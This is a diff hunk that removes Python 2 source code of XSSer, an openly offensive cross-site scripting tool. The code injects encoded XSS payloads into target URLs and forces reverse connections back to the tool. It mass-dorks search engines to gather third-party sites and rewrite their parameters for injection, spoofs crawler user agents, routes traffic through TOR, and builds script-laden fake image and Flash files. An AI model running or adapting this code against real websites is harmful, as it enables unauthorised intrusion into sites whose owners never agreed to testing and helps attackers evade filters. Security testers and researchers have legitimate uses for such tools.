-            tok_url = dest_url.replace('onerror="javascript:PAYLOAD"',
-                                       _e('onerror="javascript:' + shadow_js_inj + '"'))
-            tok_url+= '#' + self_url
-        elif '<PAYLOAD>' in dest_url:
-            tok_url = dest_url.replace("<PAYLOAD>", _e(shadow_inj))
-            tok_url+= '#' + self_url
-        elif 'PAYLOAD' in dest_url:
-            tok_url = dest_url.replace("PAYLOAD", _e(shadow_inj))
-            tok_url+= '#' + self_url
-        elif 'href' in dest_url and 'PAYLOAD' in dest_url:
-            tok_url = dest_url.replace('PAYLOAD', self_url)
-        elif 'HREF' in dest_url and 'PAYLOAD' in dest_url:
-            tok_url = dest_url.replace('PAYLOAD', self_url)
-        elif 'url' in dest_url and 'PAYLOAD' in dest_url:
-            tok_url = dest_url.replace('PAYLOAD', self_url)
-
-        self.final_attacks[hashing] = {'url': tok_url}
-        if tok_url:
-            self._webbrowser.open(tok_url)
-        else:
-            print("Cant apply any heuristic for final check on url: " + dest_url)
-
-    def _report_attack_failure(self, curl_handle, dest_url, payload,\
-                               attack_vector, orig_url, url_orig_hash):
-        """
-        report failure of an attack
-        """
-        options = self.options
-        self.hash_notfound.append((dest_url, payload['browser'], "errorcode"))
-        self.report("-"*45)
-        for reporter in self._reporters:
-            reporter.add_failure(dest_url)
-        if payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]" or payload['browser'] == "[Heuristic test]":
-            pass
-        else:
-            self.report("[-] Hashing: " + url_orig_hash)
-
-        if payload['browser'] == "[Heuristic test]":
-            self.report("[+] Trying: " + str(payload['payload']).strip('XSS'))
-        else:
-            if options.postdata:
-                try:
-                    self.report("[+] Trying: " + dest_url.strip(), "(POST:", query_string + ")")
-                except:
-                    self.report("[+] Trying: " + dest_url.strip(), "(POST)")
-            else:
-                self.report("[+] Trying: " + urllib.unquote(dest_url.strip()))
-        self.report("[+] Browser Support: " + payload['browser'])
- 
-	# statistics injections counters
-        if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
-            self.check_positives = self.check_positives + 1
-        elif payload['browser']=="[Data Control Protocol Injection]":
-            self.dcp_injection = self.dcp_injection + 1
-        elif payload['browser']=="[Document Object Model Injection]":
-            self.dom_injection = self.dom_injection + 1
-        elif payload['browser']=="[Induced Injection]":
-            self.httpsr_injection = self.httpsr_injection + 1
-        elif payload['browser']=="[manual_injection]":
-            self.manual_injection = self.manual_injection + 1
-        else:
-            self.auto_injection = self.auto_injection +1
-
-        if options.verbose:
-            self.report("[-] Headers Results:\n")
-            self.report(str(curl_handle.info()))
-            self.report("-"*45)
-
-        self.report("[-] Injection Results:")
-
-        if str(curl_handle.info()["http-code"]) == "404":
-            self.report("\n404 Not Found: The server has not found anything matching the Request-URI\n")
-        elif str(curl_handle.info()["http-code"]) == "403":
-            self.report("\n403 Forbidden: The server understood the request, but is refusing to fulfill it\n")
-        elif str(curl_handle.info()["http-code"]) == "400":
-            self.report("\n400 Bad Request: The request could not be understood by the server due to malformed syntax\n")
-        elif str(curl_handle.info()["http-code"]) == "401":
-            self.report("\n401 Unauthorized: The request requires user authentication\n\nIf you are trying to authenticate: Login is failing!\n\ncheck:\n- authentication type is correct for the type of realm (basic, digest, gss, ntlm...)\n- credentials 'user:password' are correctly typed\n")
-        elif str(curl_handle.info()["http-code"]) == "407":
-            self.report("\n407 Proxy Authentication Required: XSSer must first authenticate itself with the proxy\n")
-        elif str(curl_handle.info()["http-code"]) == "408":
-            self.report("\n408 Request Timeout: XSSer did not produce a request within the time that the server was prepared to wait\n")
-        elif str(curl_handle.info()["http-code"]) == "500":
-            self.report("\n500 Internal Server Error: The server encountered an unexpected condition which prevented it from fulfilling the request\n")
-        elif str(curl_handle.info()["http-code"]) == "501":
-            self.report("\n501 Not Implemented: The server does not support the functionality required to fulfill the request\n")
-        elif str(curl_handle.info()["http-code"]) == "502":
-            self.report("\n502 Bad Gateway: The server received an invalid response from the upstream server.\n")
-        elif str(curl_handle.info()["http-code"]) == "503":
-            self.report("\n503 Service Unavailable: The server is currently unable to handle the request due to a temporary overloading\n")
-        elif str(curl_handle.info()["http-code"]) == "504":
-            self.report("\n504 Gateway Timeout: The server did not receive a timely response specified by the URI (try: --ignore-proxy)\n")
-        elif str(curl_handle.info()["http-code"]) == "0":
-            self.report("\nXSSer is not working properly!:\n - Is something blocking connection(s)?\n - Is target url ok?: (" + orig_url + ")\n")
-        else:
-            self.report("\nNot injected!. Server responses with http-code different to: 200 OK (" + str(curl_handle.info()["http-code"]) + ")\n")
-
-        if self.options.statistics:
-            if str(curl_handle.info()["http-code"]) == "404":
-                self.not_connection = self.not_connection + 1
-            elif str(curl_handle.info()["http-code"]) == "503":
-                self.forwarded_connection = self.forwarded_connection + 1
-            else:
-                self.other_connection = self.other_connection + 1
-
-    def check_positive(self, curl_handle, dest_url, payload, attack_vector):
-        """
-        Perform extra check for positives
-        """
-        body = curl_handle.body()
-        # should check ongoing_attacks here
-        # perform extra checks
-        pass
-
-    def create_options(self, args=None):
-        """
-        Create options for OptionParser.
-        """
-        self.optionParser = XSSerOptions()
-        self.options = self.optionParser.get_options(args)
-        if not self.options:
-            return False
-        return self.options
-
-    def _get_attack_urls(self):
-        """
-        Process payload options and make up the payload list for the attack.
-        """
-        urls = []
-        options = self.options
-        p = self.optionParser
-        if options.imx:
-            self.create_fake_image(options.imx, options.script)
-            return []
-
-        if options.flash:
-            self.create_fake_flash(options.flash, options.script)
-            return []
-
-        if options.update:
-            self.report('='*75)
-            self.report(str(p.version))
-            self.report('='*75)
-            try:
-                print("\nTrying to update automatically to the latest stable version\n")
-                Updater() 
-            except:
-                print("\nSomething was wrong!. You should clone XSSer manually with:\n")
-                print("$ git clone https://github.com/epsylon/xsser\n")
-            return []
-        
-        if options.wizard: # processing wizard template
-           if self.user_template is not None:
-               self.options.statistics = True # detailed output
-               if self.user_template[0] == "DORKING": # mass-dorking
-                   self.options.dork_file = True
-                   self.options.dork_mass = True
-               elif "http" in self.user_template[0]: # from target url
-                   self.options.url = self.user_template[0]
-               else: # from file
-                   self.options.readfile = self.user_template[0]
-               if self.user_template[1] == "CRAWLER": # crawlering target
-                   self.options.crawling = "10"
-               else: # manual payload (GET or POST)
-                   if self.user_template_conntype == "GET":
-                       self.options.getdata = self.user_template[1]
-                   else:
-                       self.options.postdata = self.user_template[1]
-               if self.user_template[2] == "Proxy: No - Spoofing: Yes":
-                   self.options.ignoreproxy = True
-                   self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
-                   self.options.referer = "127.0.0.1" # spoof referer
-               elif self.user_template[2] == "Proxy: No - Spoofing: No":
-                   self.options.ignoreproxy = True
-               else: # using proxy + spoofing
-                   self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
-                   self.options.referer = "127.0.0.1" # spoof referer
-                   if self.user_template[2] is not None:
-                       self.options.proxy = self.user_template[2]
-                   else:
-                       self.options.ignoreproxy = True
-               if self.user_template[3] == "Not using encoders":
-                   pass
-               elif self.user_template[3] == "Hex": # Hexadecimal
-                   self.options.Hex = True
-               elif self.user_template[3] == "Str+Une": # StringFromCharCode()+Unescape()
-                   self.options.Str = True
-                   self.options.Une = True
-               else: # Character encoding mutations
-                   self.options.Cem = self.user_template[3]
-               if self.user_template[4] == "Alertbox": # Classic AlertBox injection
-                   self.options.finalpayload = "<script>alert('XSS');</script>"
-               else:
-                   if self.user_template[4] is not None: # Inject user script
-                       self.options.finalpayload = self.user_template[4]
-                   else: # not final injection
-                       pass 
-           else: # exit
-               return
-
-        if options.target: # miau!
-            self.report('='*75)
-            self.report(str(p.version))
-            self.report('='*75)
-            self.report("Testing [Full XSS audit]... Searching for lulz?! ;-)")
-            self.report('='*75)
-            self.report("\n[Info] The following actions will be performed at the end:\n")
-            self.report("  1- Output with detailed statistics\n")
-            self.report("  2- Export results to files: [XSSreport.raw] - [XSSer_<target>_<datetime>.xml]\n")
-            self.report("-"*22)
-            print '[Info] Good fly... and happy "Cross" hacking !!! :-)'
-            self.options.crawling = "99999" # set max num of urls to crawl
-            self.options.crawler_width = "5" # set max num of deeping levels
-            self.options.statistics = True # detailed output
-            self.options.timeout = "60" # timeout
-            self.options.retries = "2" # retries  
-            self.options.delay = "5" # delay
-            self.options.threads = "10" # threads
-            self.options.followred = True # follow redirs
-            self.options.nohead = True # no HEAD check
-            self.options.reversecheck = True # establish reverse connection 
-            self.options.fuzz = True # autofuzzing 
-            self.options.coo = True # COO
-            self.options.xsa = True # XSA
-            self.options.xsr = True # XSR
-            self.options.dcp = True # DCP
-            self.options.dom = True # DOM
-            self.options.inducedcode = True # Induced
-            self.options.fileoutput = True # Important: export results to file (.raw)
-            self.options.filexml = "XSSer_" + str(self.options.target) + "_" + str(datetime.datetime.now())+".xml" # export xml
-            self.check_trace() # XST
-            urls = [options.target]
-
-        if options.url:
-            self.report('='*75)
-            self.report(str(p.version))
-            self.report('='*75)
-            self.report("Testing [XSS from URL]...")
-            self.report('='*75)
-            urls = [options.url]
-
-        elif options.readfile:
-            self.report('='*75)
-            self.report(str(p.version))
-            self.report('='*75)
-            self.report("Testing [XSS from file]...")
-            self.report('='*75)
-            try:
-                f = open(options.readfile)
-                urls = f.readlines()
-                urls = [ line.replace('\n','') for line in urls ]
-                f.close()
-            except:
-                import os.path
-                if os.path.exists(options.readfile) == True:
-                    self.report('\nThere are some errors opening the file: ', options.readfile, "\n")
-                else:
-                    self.report('\nCannot found file: ', options.readfile, "\n")
-
-        elif options.dork: # dork a query
-            self.report('='*75)
-            self.report(str(p.version))
-            self.report('='*75)
-            self.report("Testing [XSS from Dork-Query]... Good luck! ;-)")
-            self.report('='*75)
-            if options.dork_mass: # massive dorkering
-                for e in self.search_engines:
-                    try:
-                        dorker = Dorker(e)
-                        urls = dorker.dork(options.dork)
-                        i = 0
-                        for u in urls: # replace original parameter for injection keyword (XSS)
-                            p_uri = urlparse(u)
-                            uri = p_uri.netloc
-                            path = p_uri.path
-                            target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
-                            for key, value in target_params.iteritems(): # parse params to apply keywords
-                                for v in value:
-                                    target_params[key] = 'XSS'
-                            target_url_params = urllib.urlencode(target_params)
-                            u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
-                            urls[i] = u
-                            i = i + 1
-                    except Exception, e:
-                        for reporter in self._reporters:
-                            reporter.mosquito_crashed(dorker.search_url, str(e.message))
-                    else:
-                        if urls is not None:
-                            for url in urls:
-                                for reporter in self._reporters:
-                                    reporter.add_link(dorker.search_url, url)
-            else:
-                if not options.dork_engine:
-                    options.dork_engine = 'yahoo' # default search engine [09-04/2018]
-                dorker = Dorker(options.dork_engine)
-                try:
-                    urls = dorker.dork(options.dork)
-                    i = 0
-                    for u in urls: # replace original parameter for injection keyword (XSS)
-                        p_uri = urlparse(u)
-                        uri = p_uri.netloc
-                        path = p_uri.path
-                        target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
-                        for key, value in target_params.iteritems(): # parse params to apply keywords
-                            for v in value:
-                                target_params[key] = 'XSS'
-                        target_url_params = urllib.urlencode(target_params)
-                        u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
-                        urls[i] = u
-                        i = i + 1
-                except Exception, e:
-                    for reporter in self._reporters:
-                        reporter.mosquito_crashed(dorker.search_url, str(e.message))
-                else:
-                    if urls is not None:
-                        for url in urls:
-                            for reporter in self._reporters:
-                                reporter.add_link(dorker.search_url, url)
-
-        elif options.dork_file: # dork from file ('core/fuzzing/dorks.txt')
-            self.report('='*75)
-            self.report(str(p.version))
-            self.report('='*75)
-            self.report("Testing [XSS from Dork-File]... Good luck! ;-)")
-            self.report('='*75)
-            try:
-                f = open('core/fuzzing/dorks.txt')
-                dorks = f.readlines()
-                dorks = [ dork.replace('\n','') for dork in dorks ]
-                f.close()
-                if not dorks:
-                    print "\n[Error] - Imposible to retrieve 'dorks' from file.\n"
-                    return
-            except:
-                if os.path.exists('core/fuzzing/dorks.txt') == True:
-                    print '[Error] - Cannot open:', 'dorks.txt', "\n"
-                    return 
-                else:
-                    print '[Error] - Cannot found:', 'dorks.txt', "\n"
-                    return
-            if not options.dork_engine:
-                options.dork_engine = 'yahoo' # default search engine [09-04/2018]
-            if options.dork_mass: # massive dorkering
-                for e in self.search_engines:
-                    try:
-                        dorker = Dorker(e)
-                        for dork in dorks:
-                            urls = dorker.dork(dork)
-                        i = 0
-                        for u in urls: # replace original parameter for injection keyword (XSS)
-                            p_uri = urlparse(u)
-                            uri = p_uri.netloc
-                            path = p_uri.path
-                            target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
-                            for key, value in target_params.iteritems(): # parse params to apply keywords
-                                for v in value:
-                                    target_params[key] = 'XSS'
-                            target_url_params = urllib.urlencode(target_params)
-                            u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
-                            urls[i] = u
-                            i = i + 1
-                    except Exception, e:
-                        for reporter in self._reporters:
-                            reporter.mosquito_crashed(dorker.search_url, str(e.message))
-                    else:
-                        if urls is not None:
-                            for url in urls:
-                                for reporter in self._reporters:
-                                    reporter.add_link(dorker.search_url, url)
-            else:
-                dorker = Dorker(options.dork_engine)
-                try:
-                    for dork in dorks:
-                        urls = dorker.dork(dork)
-                    i = 0
-                    for u in urls: # replace original parameter for injection keyword (XSS)
-                        p_uri = urlparse(u)
-                        uri = p_uri.netloc
-                        path = p_uri.path
-                        target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
-                        for key, value in target_params.iteritems(): # parse params to apply keywords
-                            for v in value:
-                                target_params[key] = 'XSS'
-                        target_url_params = urllib.urlencode(target_params)
-                        u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
-                        urls[i] = u
-                        i = i + 1
-                except Exception, e:
-                    for reporter in self._reporters:
-                        reporter.mosquito_crashed(dorker.search_url, str(e.message))
-                else:
-                    if urls is not None:
-                        for url in urls:
-                            for reporter in self._reporters:
-                                reporter.add_link(dorker.search_url, url)
-
-        if options.crawling: # crawlering target(s)
-            nthreads = options.threads
-            self.crawled_urls = list(urls)
-            all_crawled = []
-            if self.options.crawler_width == None:
-                self.options.crawler_width = 3 # default crawlering-width
-            if self.options.crawler_local == None:
-                self.options.crawler_local = True # default local-crawlering
-            for url in set(urls):
-                self.report("\n[Info] Crawlering:", url, "- Max limit: ["+ options.crawling+ "] - Deep level: ["+ str(options.crawler_width) + "]")
-                self.report("\n", "-"*22)
-            crawler = Crawler(self, Curl, all_crawled,
-                              self.pool)
-            crawler.set_reporter(self)
-            # now wait for all results to arrive
-            while urls:
-                self.run_crawl(crawler, urls.pop(), options)
-            while not self._landing:
-                for reporter in self._reporters:
-                    reporter.report_state('broad scanning')
-                try:
-                    self.pool.poll()
-                except NoResultsPending:
-                    crawler.cancel()
-                    break
-                if len(self.crawled_urls) >= int(options.crawling) or not crawler._requests:
-                    self.report("\n[Info] Found enough results... calling all mosquitoes to home!")
-                    crawler.cancel()
-                    break
-                time.sleep(0.1)
-            self.report("\n", "-"*22)
-            self.report("\n[Info] Mosquitoes found: " + str(len(self.crawled_urls)) + " payload(s)!\n")
-            return self.crawled_urls
-     
-        if not options.imx or not options.flash or not options.xsser_gtk or not options.update:
-            return urls
-            
-    def run_crawl(self, crawler, url, options):
-        def _cb(request, result):
-            pass
-
-        def _error_cb(request, error):
-            for reporter in self._reporters:
-                reporter.mosquito_crashed(url, str(error[0]))
-            traceback.print_tb(error[2])
-
-        def crawler_main(args):
-            return crawler.crawl(*args)
-        crawler.crawl(url, int(options.crawler_width),
-                      int(options.crawling),options.crawler_local)
-        
-    def poll_workers(self):
-        try:
-            self.pool.poll()
-        except NoResultsPending:
-            pass
-
-    def try_running(self, func, error, args=[]):
-        """
-        Try running a function and print some error if it fails and exists with
-        a fatal error.
-        """
-        try:
-            return func(*args)
-        except Exception, e:
-            self.report(error, "error")
-            if DEBUG:
-                traceback.print_exc()
- 
-    def check_trace(self):
-        """
-        Check for Cross Site Tracing (XST) vulnerability: 
-            1) check HTTP TRACE method enabled (add 'Max-Forwards: 0' to curl command to bypass some 'Anti-antixst' web proxy rules) 
-            2) check data sent on reply 
-        """
-        agent = 'Googlebot/2.1b'
-        referer = '127.0.0.1'
-        import subprocess, shlex
-        if self.options.xst:
-            xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.xst), stdout=subprocess.PIPE)
-        if self.options.target:
-            xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.target), stdout=subprocess.PIPE)
-        line1 = xst.stdout.readline()
-        print ""
-        while True:
-            line = xst.stdout.readline()
-            if line != '':
-                print line.rstrip()
-            else:
-                break
-        print ""
-        self.report('='*75)
-        if "200 OK" in line1.rstrip():
-            print "[Info] Target is vulnerable to XST! (Cross Site Tracing) ;-)"
-        else:
-            print "[Info] Target is NOT vulnerable to XST (Cross Site Tracing) ..."
-        if self.options.target:
-            self.report('='*75)
- 
-    def start_wizard(self):
-        """
-        Start Wizard Helper
-        """
-        #step 0: Menu
-        ans1=True
-        ans2=True
-        ans3=True
-        ans4=True
-        ans5=True
-        ans6=True
-
-        #step 1: Where
-        while ans1:
-            print("""\nA)- Where are your targets?\n
-             [1]- I want to enter the url of my target directly.
-             [2]- I want to enter a list of targets from a .txt file.
-            *[3]- I don't know where are my target(s)... I just want to explore! :-)
-             [e]- Exit/Quit/Abort.
-            """)
-            ans1 = raw_input("Your choice: [1], [2], [3] or [e]xit\n")
-            if ans1 == "1": # from url
-                url = raw_input("Target url (ex: http(s)://target.com): ")
-                if url.startswith("http"):
-                    ans1 = None
-                else:
-                    print "\n[Error] Your url is not valid!. Try again!"
-                    pass
-            elif ans1 == "2": # from file
-                url = raw_input("Path to file (ex: 'targets_list.txt'): ")
-                if url == None:
-                    print "\n[Error] Your are not providing a valid file. Try again!"
-                    pass
-                else:
-                    ans1 = None
-            elif ans1 == "3": # dorking
-                url = "DORKING" 
-                ans1 = None
-            elif (ans1 == "e" or ans1 == "E"):
-                print "Closing wizard..."
-                ans1=None
-                ans2=None
-                ans3=None
-                ans4=None
-                ans5=None
-                ans6=None
-            else:
-                print "\nNot valid choice. Try again!"
-
-        #step 2: How
-        while ans2:
-            print 22*"-"
-            print("""\nB)- How do you want to connect?\n
-             [1]- I want to connect using GET and select some possible vulnerable parameter(s) directly.
-             [2]- I want to connect using POST and select some possible vulnerable parameter(s) directly.
-             [3]- I want to "crawl" all the links of my target(s) to found as much vulnerabilities as possible.
-            *[4]- I don't know how to connect... Just do it! :-)
-             [e]- Exit/Quit/Abort.
-            """)
-            ans2 = raw_input("Your choice: [1], [2], [3], [4] or [e]xit\n")
-            if ans2 == "1": # using GET
-                payload = raw_input("GET payload (ex: '/menu.php?q='): ")
-                if payload == None:
-                    print "\n[Error] Your are providing an empty payload. Try again!"
-                    pass
-                else:
-                    self.user_template_conntype = "GET"
-                    ans2 = None
-            elif ans2 == "2": # using POST
-                payload = raw_input("POST payload (ex: 'foo=1&bar='): ")
-                if payload == None:
-                    print "\n[Error] Your are providing an empty payload. Try again!"
-                    pass
-                else:
-                    self.user_template_conntype = "POST"
-                    ans2 = None
-            elif ans2 == "3": # crawlering
-                payload = "CRAWLER" 
-                ans2 = None
-            elif ans2 == "4": # crawlering
-                payload = "CRAWLER"
-                ans2 = None
-            elif (ans2 == "e" or ans2 == "E"):
-                print "Closing wizard..."
-                ans2=None
-                ans3=None
-                ans4=None
-                ans5=None
-                ans6=None
-            else:
-                print "\nNot valid choice. Try again!"
-
-        #step 3: Proxy
-        while ans3:
-            print 22*"-"
-            print("""\nC)- Do you want to be 'anonymous'?\n
-             [1]- Yes. I want to use my proxy and apply automatic spoofing methods.
-             [2]- Anonymous?. Yes!!!. I have a TOR proxy ready at: http://127.0.0.1:8118. 
-            *[3]- Yes. But I haven't any proxy. :-)
-             [4]- No. It's not a problem for me to connect directly to the target(s).
-             [e]- Exit/Quit.
-            """)
-            ans3 = raw_input("Your choice: [1], [2], [3], [4] or [e]xit\n")
-            if ans3 == "1": # using PROXY + spoofing
-                proxy = raw_input("Enter proxy [http(s)://server:port]: ")
-                ans3 = None
-            elif ans3 == "2": # using TOR + spoofing
-                proxy = 'Using TOR (default: http://127.0.0.1:8118)'
-                proxy = 'http://127.0.0.1:8118'
-                ans3 = None
-            elif ans3 == "3": # only spoofing
-                proxy = 'Proxy: No - Spoofing: Yes' 
-                ans3 = None
-            elif ans3 == "4": # no spoofing
-                proxy = 'Proxy: No - Spoofing: No'
-                ans3 = None
-            elif (ans3 == "e" or ans3 == "E"):
-                print "Closing wizard..."
-                ans3=None
-                ans4=None
-                ans5=None
-                ans6=None
-            else:
-                print "\nNot valid choice. Try again!"
-
-        #step 4: Bypasser(s)
-        while ans4:
-            print 22*"-"
-            print("""\nD)- Which 'bypasser(s' do you want to use?\n
-             [1]- I want to inject XSS scripts without any encoding.
-             [2]- Try to inject code using 'Hexadecimal'.
-             [3]- Try to inject code mixing 'String.FromCharCode()' and 'Unescape()'.
-             [4]- I want to inject using 'Character Encoding Mutations' (Une+Str+Hex). 
-            *[5]- I don't know exactly what is a 'bypasser'... But I want to inject code! :-)
-             [e]- Exit/Quit.
-            """)
-            ans4 = raw_input("Your choice: [1], [2], [3], [4], [5] or [e]xit\n")
-            if ans4 == "1": # no encode
-                enc = "Not using encoders"
-                ans4 = None
-            elif ans4 == "2": # enc: Hex
-                enc = 'Hex'
-                ans4 = None
-            elif ans4 == "3": # enc: Str+Une
-                enc = 'Str+Une' 
-                ans4 = None
-            elif ans4 == "4": # enc: Mix: Une+Str+Hex
-                enc = "Une,Str,Hex"
-                ans4 = None
-            elif ans4 == "5": # enc: no encode
-                enc = 'Not using encoders' 
-                ans4 = None
-            elif (ans4 == "e" or ans4 == "E"):
-                print "Closing wizard..."
-                ans4=None
-                ans5=None
-                ans6=None
-            else:
-                print "\nNot valid choice. Try again!"
-
-        #step 5: Exploiting
-        while ans5:
-            print 22*"-"
-            print("""\nE)- Which final code do you want to 'exploit' on vulnerabilities found?\n
-             [1]- I want to inject a classic "Alert" message box.
-             [2]- I want to inject my own scripts.
-            *[3]- I don't want to inject a final code... I just want to discover vulnerabilities! :-)
-             [e]- Exit/Quit.
-            """)
-            ans5 = raw_input("Your choice: [1], [2], [3] or [e]xit\n")
-            if ans5 == "1": # alertbox
-                script = 'Alertbox'
-                ans5 = None
-            elif ans5 == "2": # manual
-                script = raw_input("Enter code (ex: '><script>alert('XSS');</script>): ")
-                if script == None:
-                    print "\n[Error] Your are providing an empty script to inject. Try again!"
-                    pass
-                else:
-                    ans5 = None
-            elif ans5 == "3": # no exploit
-                script = 'Not exploiting code' 
-                ans5 = None
-            elif (ans5 == "e" or ans5 == "E"):
-                print "Closing wizard..."
-                ans5=None
-                ans6=None
-            else:
-                print "\nNot valid choice. Try again!"
-
-        #step 6: Final
-        while ans6:
-            print 22*"-"
-            print "\nVery nice!. That's all. Your last step is to -accept or not- this template.\n"
-            print "A)- Target:", url
-            print "B)- Payload:", payload
-            print "C)- Privacy:", proxy
-            print "D)- Bypasser(s):", enc
-            print "E)- Final:", script
-            print("""
-            [Y]- Yes. Accept it and start testing!.
-            [N]- No. Abort it?.
-            """)
-            ans6 = raw_input("Your choice: [Y] or [N]\n")
-            if (ans6 == "y" or ans6 == "Y"): # YES
-                start = 'YES'
-                print 'Good fly... and happy "Cross" hacking !!! :-)\n'
-                ans6 = None
-            elif (ans6 == "n" or ans6 == "N"): # NO
-                start = 'NO'
-                print "Aborted!. Closing wizard..."
-                ans6 = None
-            else:
-                print "\nNot valid choice. Try again!"
-            if url and payload and proxy and enc and script:
-                return url, payload, proxy, enc, script
-            else:
-                return
-
-    def create_fake_image(self, filename, payload):
-        """
-        Create -fake- image with code injected
-        """
-        options = self.options
-        filename = options.imx
-        payload = options.script
-        image_xss_injections = ImageInjections()
-        image_injections = image_xss_injections.image_xss(options.imx , options.script)
-        return image_injections
-
-    def create_fake_flash(self, filename, payload):
-        """
-        Create -fake- flash movie (.swf) with code injected
-    	"""
-        options = self.options
-        filename = options.flash
-        payload = options.script
-        flash_xss_injections = FlashInjections()
-        flash_injections = flash_xss_injections.flash_xss(options.flash, options.script)
-        return flash_injections
-
-    def create_gtk_interface(self):
-        """
-        Create GTK Interface
-        """
-        options = self.options
-        from core.gtkcontroller import Controller, reactor
-        uifile = "xsser.ui"
-        controller = Controller(uifile, self)
-        self._reporters.append(controller)
-        if reactor:
-            reactor.run()
-        else:
-            import gtk
-            gtk.main()
-        return controller
-
-    def run(self, opts=None):
-        """
-        Run xsser.
-        """
-        self._landing = False
-        for reporter in self._reporters:
-            reporter.start_attack()
-        if opts:
-            options = self.create_options(opts)
-            self.set_options(options)
-
-        if not self.mothership and not self.hub:
-            self.hub = HubThread(self)
-            self.hub.start()
-
-        options = self.options
-        # step 0: third party tricks
-        try:
-            if self.options.imx: # create -fake- image with code injected
-                p = self.optionParser
-                self.report('='*75)
-                self.report(str(p.version))
-                self.report('='*75)
-                self.report("[Image XSS auto-builder]... remember; only IE6 and versions below.")
-                self.report('='*75)
-                self.report(''.join(self.create_fake_image(self.options.imx, self.options.script)))
-                self.report('='*75 + "\n")
-        except:
-            return
-
-        if options.flash: # create -fake- flash movie (.swf) with code injected
-            p = self.optionParser
-            self.report('='*75)
-            self.report(str(p.version))
-            self.report('='*75)
-            self.report("[Flash Attack! XSS auto-builder]... ready to be embedded ;)")
-            self.report('='*75)
-            self.report(''.join(self.create_fake_flash(self.options.flash, self.options.script)))
-            self.report('='*75 + "\n")
-
-        if options.xsser_gtk:
-            self.create_gtk_interface()
-            return
-
-        if self.options.wizard: # start a wizard helper
-            p = self.optionParser
-            self.report('='*75)
-            self.report(str(p.version))
-            self.report('='*75)
-            self.report("[Wizard] Generating XSS attack...")
-            self.report('='*75)
-            self.user_template = self.start_wizard()
-
-        if self.options.xst: # check for cross site tracing
-            p = self.optionParser
-            if not self.options.target:
-                self.report('='*75)
-                self.report(str(p.version))
-                self.report('='*75)
-                self.report("[XST Attack!] checking for HTTP TRACE method ...")
-                self.report('='*75)
-            self.check_trace()
-
-        nthreads = max(1, abs(options.threads))
-        nworkers = len(self.pool.workers)
-        if nthreads != nworkers:
-            if nthreads < nworkers:
-                self.pool.dismissWorkers(nworkers-nthreads)
-            else:
-                self.pool.createWorkers(nthreads-nworkers)
-
-        for reporter in self._reporters:
-            reporter.report_state('scanning')
-        
-        # step 1: get urls
-        urls = self.try_running(self._get_attack_urls, "\n[Error] Internal error getting -targets-")
-        for reporter in self._reporters:
-            reporter.report_state('arming')
-        
-        # step 2: get payloads
-        payloads = self.try_running(self.get_payloads, "\n[Error] Internal error getting -payloads-")
-        for reporter in self._reporters:
-            reporter.report_state('cloaking')
-        if options.Dwo:
-            payloads = self.process_payloads_ipfuzzing(payloads)
-        elif options.Doo:
-            payloads = self.process_payloads_ipfuzzing_octal(payloads)
-
-        for reporter in self._reporters:
-            reporter.report_state('locking targets')
-        
-        # step 3: get query string
-        query_string = self.try_running(self.get_query_string, "\n[Error] Internal error getting query -string-")
-
-        # step 4: print curl options if requested
-        if options.verbose:
-            Curl.print_options()
-
-        for reporter in self._reporters:
-            reporter.report_state('sanitize')
-        urls = self.sanitize_urls(urls)
-
-        for reporter in self._reporters:
-            reporter.report_state('attack')
-
-        # step 5: perform attack
-        self.try_running(self.attack, "\n[Error] Internal problems running attack: ", (urls, payloads, query_string))
-
-        for reporter in self._reporters:
-            reporter.report_state('reporting')
-
-        if len(self.final_attacks):
-            self.report("Waiting for tokens to arrive")
-        while self._ongoing_requests and not self._landing:
-            if not self.pool:
-                self.mothership.poll_workers()
-            else:
-                self.poll_workers()
-            time.sleep(0.2)
-            for reporter in self._reporters:
-                reporter.report_state('final sweep..')
-        print("="*75 + "\n")
-        if self.pool:
-            self.pool.dismissWorkers(len(self.pool.workers))
-            self.pool.joinAllDismissedWorkers()
-        start = time.time()
-        while not self._landing and len(self.final_attacks) and time.time() - start < 5.0:
-            time.sleep(0.2)
-            for reporter in self._reporters:
-                reporter.report_state('landing.. '+str(int(5.0 - (time.time() - start))))
-        if self.final_attacks:
-            self.report("Forcing a reverse connection XSSer will certify that your target is 100% vulnerable\n")
-            for final_attack in self.final_attacks.itervalues():
-                if not final_attack['url'] == None:
-                    self.report("Connecting from:", final_attack['url'] , "\n")
-                self.report(",".join(self.successfull_urls) , "is connecting remotely to XSSer... You have it! ;-)", "\n")
-                self.report("="*50 + "\n")
-        for reporter in self._reporters:
-            reporter.end_attack()
-        if self.mothership:
-            self.mothership.remove_reporter(self)
-            print("="*75 + "\n")
-            self.report("Mosquito(es) landed!\n")
-        else:
-            self.report("Mosquito(es) landed!")
-        self.print_results()
-
-    def sanitize_urls(self, urls):
-        all_urls = set()
-        if urls is not None:
-            for url in urls:
-                if url.startswith("http://") or url.startswith("https://"):
-                    self.urlspoll.append(url)
-                    all_urls.add(url)
-                else:
-                    self.report("\nThis target: (" + url + ") is not a correct url [DISCARDED]\n")
-                    url = None
-        else:
-            print "\n[Info] Not any valid source provided to start a test... Aborting!\n"
-        return all_urls
-
-    def land(self, join=False):
-        self._landing = True
-        if self.hub:
-            self.hub.shutdown()
-            if join:
-                self.hub.join()
-                self.hub = None
-
-    def _prepare_extra_attacks(self, payload):
-        """
-        Setup extra attacks.
-        """
-        agents = [] # user-agents
-        try:
-            f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
-        except:
-            f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
-        for line in f:
-            agents.append(line)
-        agent = random.choice(agents).strip() # set random user-agent
-        referer = "127.0.0.1"
